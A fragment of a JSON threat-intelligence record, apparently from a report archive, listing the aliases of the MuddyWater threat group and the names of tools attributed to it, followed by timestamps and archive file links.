				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434122,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/503a49981eb14d6378dffa21a0e92728d7e069c2.pdf",
		"text": "https://archive.orkl.eu/503a49981eb14d6378dffa21a0e92728d7e069c2.txt",
		"img": "https://archive.orkl.eu/503a49981eb14d6378dffa21a0e92728d7e069c2.jpg"
	}
}